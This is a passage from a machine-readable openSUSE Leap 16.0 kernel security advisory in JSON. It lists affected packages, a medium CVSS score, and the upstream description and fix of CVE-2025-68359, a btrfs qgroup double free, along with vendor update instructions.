"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68356"
},
{
"cve": "CVE-2025-68359",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68359"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix double free of qgroup record after failure to add delayed ref head\n\nIn the previous code it was possible to incur into a double kfree()\nscenario when calling add_delayed_ref_head(). This could happen if the\nrecord was reported to already exist in the\nbtrfs_qgroup_trace_extent_nolock() call, but then there was an error\nlater on add_delayed_ref_head(). In this case, since\nadd_delayed_ref_head() returned an error, the caller went to free the\nrecord. Since add_delayed_ref_head() couldn\u0027t set this kfree\u0027d pointer\nto NULL, then kfree() would have acted on a non-NULL \u0027record\u0027 object\nwhich was pointing to memory already freed by the callee.\n\nThe problem comes from the fact that the responsibility to kfree the\nobject is on both the caller and the callee at the same time. Hence, the\nfix for this is to shift the ownership of the \u0027qrecord\u0027 object out of\nthe add_delayed_ref_head(). That is, we will never attempt to kfree()\nthe given object inside of this function, and will expect the caller to\nact on the \u0027qrecord\u0027 object on its own. The only exception where the\n\u0027qrecord\u0027 object cannot be kfree\u0027d is if it was inserted into the\ntracing logic, for which we already have the \u0027qrecord_inserted_ret\u0027\nboolean to account for this. Hence, the caller has to kfree the object\nonly if add_delayed_ref_head() reports not to have inserted it on the\ntracing logic.\n\nAs a side-effect of the above, we must guarantee that\n\u0027qrecord_inserted_ret\u0027 is properly initialized at the start of the\nfunction, not at the end, and then set when an actual insert\nhappens. This way we avoid \u0027qrecord_inserted_ret\u0027 having an invalid\nvalue on an early exit.\n\nThe documentation from the add_delayed_ref_head() has also been updated\nto reflect on the exact ownership of the \u0027qrecord\u0027 object.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68359",
"url": "https://www.suse.com/security/cve/CVE-2025-68359"
},
{
"category": "external",
"summary": "SUSE Bug 1255542 for CVE-2025-68359",
"url": "https://bugzilla.suse.com/1255542"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
